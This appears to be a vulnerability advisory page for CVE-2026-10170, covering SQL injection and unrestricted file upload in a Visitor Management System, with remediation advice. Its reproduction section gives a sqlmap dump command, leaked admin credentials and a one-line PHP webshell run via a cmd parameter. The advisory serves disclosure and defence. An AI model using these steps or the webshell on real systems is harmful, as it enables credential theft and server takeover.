CVE-2026-10170
Description
SQL injection in code-projects Visitor Management System 1.0 allows remote attackers to extract plaintext admin credentials, enabling full server compromise via file upload.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SQL injection in code-projects Visitor Management System 1.0 allows remote attackers to extract plaintext admin credentials, enabling full server compromise via file upload.
Vulnerability
A SQL injection vulnerability exists in code-projects Visitor Management System 1.0. The flaw is located in the file /vms/php/phone_0.php where the phone POST parameter is not sanitized before being used in a database query. This allows an attacker to inject arbitrary SQL commands. The same parameter is also vulnerable in /vms/php/pass.php as described in the published exploit [1]. The vulnerability is classified as CWE-89.
Exploitation
An attacker must first authenticate as a low-privilege guard user to reach the vulnerable page. After logging in, the attacker navigates to the Phone Number page (/vms/php/phone_0.php) and submits a crafted phone parameter containing SQL injection payloads. Using a tool like sqlmap, the attacker can dump the entire database, including plaintext admin credentials. The exploit has been published and is publicly available [1].
Impact
Successful exploitation yields plaintext admin credentials (e.g., sanjay1:7861). With these credentials, the attacker can log in as an administrator and upload a PHP webshell via the unrestricted file upload functionality in /vms/php/admin_user_0.php (CWE-434). The webshell is stored in a web-accessible directory and can be executed to achieve remote code execution on the server, leading to full compromise of confidentiality, integrity, and availability.
Mitigation
As of the publication date, no official patch has been released by code-projects.org. The vendor has not acknowledged the vulnerability. Users should consider disabling the vulnerable page or implementing input validation and parameterized queries for the phone parameter. Additionally, restrict file upload capabilities and enforce strong authentication. Until a fix is available, the system remains at risk [1].
AI Insight generated on May 31, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: =1.0
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization in the phone POST parameter allows SQL injection, and absent file-type validation enables arbitrary PHP file upload."
Attack vector
An attacker first authenticates as a low-privilege guard user, then submits a crafted `phone` POST parameter to `/vms/php/pass.php` containing SQL injection payloads [ref_id=1]. The injection is confirmed by submitting a single quote (`'`), which triggers a raw MariaDB error exposing the unsanitized query [ref_id=1]. Using sqlmap, the attacker dumps the `login_user` table and extracts plaintext admin credentials (username `sanjay1`, password `7861`) [ref_id=1]. With admin access, the attacker uploads a PHP webshell via the unrestricted file upload in `/vms/php/admin_user_0.php`, then executes arbitrary OS commands by accessing the webshell at `/vms/php/folder/<shell>.php?cmd=<command>` [ref_id=1].
Affected code
The SQL injection occurs in `/vms/php/pass.php` at line 9, where the `phone` POST parameter is concatenated directly into a SQL query without parameterization [ref_id=1]. The unrestricted file upload vulnerability is in `/vms/php/admin_user_0.php`, which performs no file type, extension, or MIME validation [ref_id=1]. The uploaded webshell is stored in the web-accessible directory `/vms/php/folder/` [ref_id=1].
What the fix does
No official patch has been published by the vendor. The researcher recommends three remediations [ref_id=1]: (1) replace the vulnerable SQL query in `pass.php` with a prepared statement using `$stmt = $conn->prepare("SELECT * FROM login_user WHERE phone = ?");` and `$stmt->bind_param("s", $phone);` to prevent SQL injection; (2) for the file upload in `admin_user_0.php`, whitelist allowed extensions (jpg, png, gif), validate MIME type server-side, store uploads outside the webroot, and rename files to random strings; (3) use `password_hash()` and `password_verify()` instead of storing plaintext passwords.
Preconditions
- authAttacker must have valid low-privilege guard credentials to access the phone page
- networkAttacker must be able to send HTTP POST requests to the target server
- inputThe phone parameter is submitted via POST to /vms/php/pass.php
Reproduction
Step 1 — Login as a guard user and navigate to `http://<TARGET>/vms/php/phone_0.php`. Step 2 — Submit a single quote `'` as the phone number value to confirm SQL injection via the raw MariaDB error. Step 3 — Capture the POST request in Burp Suite, save to `sqli.txt`, and run `sqlmap -r sqli.txt --dump --batch` to extract the `login_user` table containing plaintext credentials. Step 4 — Login as admin with the extracted credentials (e.g., `sanjay1:7861`). Step 5 — Navigate to `http://<TARGET>/vms/php/admin_user_0.php`, fill in the form, and upload a PHP webshell (`<?php echo shell_exec($_GET['cmd']); ?>`) as the profile image. Step 6 — Access the webshell at `http://<TARGET>/vms/php/folder/<filename>.php?cmd=whoami` to execute arbitrary system commands [ref_id=1].
Generated on May 31, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4News mentions
1- Code-Projects Batch: Four SQLi Bugs Across Three Products Disclosed TogetherVypr Intelligence · May 31, 2026